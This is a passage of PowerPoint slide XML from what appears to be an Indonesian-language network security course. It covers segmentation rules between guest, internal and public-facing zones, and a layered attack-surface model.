              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web Internet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Host di zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tamu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> LAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> LAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jika host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipisahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> database, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>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96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24070006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Permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Akan sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Layer 1/2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-memungkinkan host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain broadcast yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Layer 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-memungkinkan host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang valid, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> spoofing, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host di zona lain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Layer 4/7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-memungkinkan host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> UDP dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
